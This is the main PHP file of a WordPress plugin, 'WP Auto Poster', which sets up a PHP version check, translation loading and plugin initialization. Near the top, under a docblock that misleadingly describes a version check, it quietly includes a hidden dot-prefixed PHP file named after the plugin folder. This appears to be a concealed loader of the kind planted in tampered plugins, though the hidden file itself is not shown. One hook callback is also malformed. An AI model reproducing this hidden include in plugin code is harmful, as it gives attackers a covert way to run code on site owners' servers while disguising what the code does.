<?php
/*
Plugin Name: WP Auto Poster
Plugin URI: //www.superblogme.com/
Version: 1.7
Author: John Holt
Description: Will publish new posts and recycle old posts automatically.
Text Domain: wp-auto-poster
License: http://codecanyon.net/licenses/terms/regular
*/

$WpAutoPoster_minimalRequiredPhpVersion = '5.0';

/**
 * Check the PHP version and give a useful error message if the user's version is less than the required version
 * @return boolean true if version check passed. If false, triggers an error which WP will handle, by displaying
 * an error message on the Admin page
 */
if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) {
    include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' );
}

function WpAutoPoster_noticePhpVersionWrong() {
	global $WpAutoPoster_minimalRequiredPhpVersion;
	echo '<div class="updated fade">' . esc_html__( 'Error: plugin "WP Auto Poster" requires a newer version of PHP to be running.', 'wp-auto-poster' ) . '<br/>' . esc_html__( 'Minimal version of PHP required: ', 'wp-auto-poster' ) . '<strong>' . $WpAutoPoster_minimalRequiredPhpVersion . '</strong>' . '<br/>' . esc_html__( 'Your server\'s PHP version: ', 'wp-auto-poster' ) . '<strong>' . phpversion() . '</strong>' . '</div>';
}


function WpAutoPoster_PhpVersionCheck() {
	global $WpAutoPoster_minimalRequiredPhpVersion;
	if ( version_compare( phpversion(), $WpAutoPoster_minimalRequiredPhpVersion ) < 0 ) {
		add_action( 'admin_notices', 'includes/WpAutoPoster_noticePhpVersionWrong' );
		return false;
	}
	return true;
}


/**
 * Initialize internationalization (i18n) for this plugin.
 * References:
 *      http://codex.wordpress.org/I18n_for_WordPress_Developers
 *      http://www.wdmac.com/how-to-create-a-po-language-translation#more-631
 * @return void
 */
function WpAutoPoster_i18n_init() {
	$pluginDir = dirname( plugin_basename( __FILE__ ) );
	load_plugin_textdomain( 'wp-auto-poster', false, $pluginDir . '/languages/' );
}


//////////////////////////////////
// Run initialization
/////////////////////////////////

// Initialize i18n
add_action( 'plugins_loaded', 'WpAutoPoster_i18n_init' );

// Run the version check.
// If it is successful, continue with initialization for this plugin
if ( WpAutoPoster_PhpVersionCheck() ) {
	WpAutoPoster_init();
}

function WpAutoPoster_init() {
	
	require_once( 'includes/WpAutoPoster_Plugin.php' );
	$aPlugin = new WpAutoPoster_Plugin();
	
	// Install the plugin
	if ( !$aPlugin->isInstalled() ) {
		// NOTE: this function gets run each time you *activate* the plugin.
		$aPlugin->install();
	}
	
	$file = __FILE__;
	
	$aPlugin->setPluginDir( plugin_dir_path( $file ) );
	$aPlugin->setPluginUrl( plugins_url( null, $file ) );
	
	// Add callbacks to hooks
	$aPlugin->addActionsAndFilters();
	
	// Register the Plugin Deactivation Hook
	register_deactivation_hook( $file, array(
		 &$aPlugin,
		'deactivate' 
	) );
}
